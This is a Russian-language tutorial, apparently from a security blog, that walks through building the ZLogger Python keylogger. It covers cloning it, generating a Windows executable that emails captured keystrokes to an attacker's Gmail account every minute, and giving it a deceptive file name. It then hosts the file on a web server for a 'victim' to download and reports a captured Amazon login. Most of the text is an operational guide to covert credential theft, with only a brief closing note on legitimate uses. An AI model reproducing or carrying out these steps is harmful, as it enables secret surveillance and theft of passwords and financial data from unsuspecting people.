Многие кейлоггеры считаются троянскими программами, поскольку они скрываются в системе и обладают функциями руткита.

Кейлоггеры - это разновидность программного обеспечения для мониторинга, которое записывает нажатия клавиш пользователем. Эти регистраторы нажатия клавиш, один из старейших типов кибератак, записывают информацию, которую вы вводите на веб-сайте или в приложении, и отправляют ее третьей стороне.

ZLogger - один из кейлоггеров на основе Python, написанный профессионалом в области безопасности Зайд Аль-Кураиши. Основная особенность этого инструмента - создание постоянного кейлоггера для операционных систем Windows и Linux. ZLogger не требует прав администратора и запускается при запуске системы. Он фиксирует каждый ключевой строб и отправляет отчет по электронной почте злоумышленнику.

Чтобы загрузить ZLogger, посетите следующую страницу https://github.com/z00z/ZLogger и скопируйте ссылку для загрузки.

Откройте свой терминал и загрузите инструмент с помощью команды «git clone».

Пример: (root @ kali: / opt # git clone https://github.com/z00z/ZLogger.git).

Затем смените каталог на «ZLogger» и просмотрите содержимое.

Чтобы запустить программу, нам нужно использовать команду «python», и чтобы сначала указать некоторые параметры, нам нужно перечислить все доступные параметры с помощью «- help» оператор.

Пример: (root @ kali: / opt / ZLogger # python zlogger.py - справка).

Теперь давайте создадим кейлоггер и посмотрим, как он работает. В этом примере мы настроим таргетинг на операционную систему на базе Windows с помощью параметра «-w» с интервалом «-i» в 60 секунд. Так что каждую минуту наш кейлоггер будет отправлять отчет. Затем нам нужно указать наш адрес электронной почты, используя параметр «-e» и пароль «-p» учетной записи электронной почты. Нам необходимо предоставить эту информацию, чтобы кейлоггер знал, куда отправлять захваченные данные. Наконец, мы выводим наш файл кейлоггера с помощью параметра «-o».

Пример: (root @ kali: / opt / ZLogger # python zlogger.py -i 60 -w -e [email protected] -p johndoesecurity -o please_click_me_I_am_not_a_keylogger).

После того, как кейлоггер завершит процесс, он будет сохранен в каталоге ZLogger / dist / как файл please_click_me_I_am_not_a_keylogger . Перед запуском этого файла на целевом компьютере не забудьте разрешить менее безопасные приложения в своей учетной записи Gmail. Используйте для этого следующую ссылку https://myaccount.google.com/lesssecureapps.

Затем скопируйте файл на наш веб-сервер, чтобы его можно было легко найти и загрузить с целевого компьютера.

Пример: (root @ kali: / opt / ZLogger / dist # cp please_click_me_I_am_not_a_keylogger.exe /var/www/html/Evil-Files/).

Теперь давайте загрузим его на компьютер жертвы и посмотрим, как он работает.

Как только наша жертва запускает исполняемый файл и пытается что-то напечатать или просмотреть, наш кейлоггер захватит и отправит их на наш адрес электронной почты.

Как показано на изображении ниже, нам удалось получить отчет от ZLogger с захваченным именем пользователя и паролем от Amazon.

Кейлоггеры используются преступниками для кражи личной или финансовой информации, такой как банковская информация, которую они затем продают или используют для получения прибыли. Однако они имеют законное применение на рабочем месте, например, для устранения неполадок, улучшения взаимодействия с пользователем и мониторинга сотрудников. Кейлоггинг также используется для наблюдения правоохранительными органами и спецслужбами.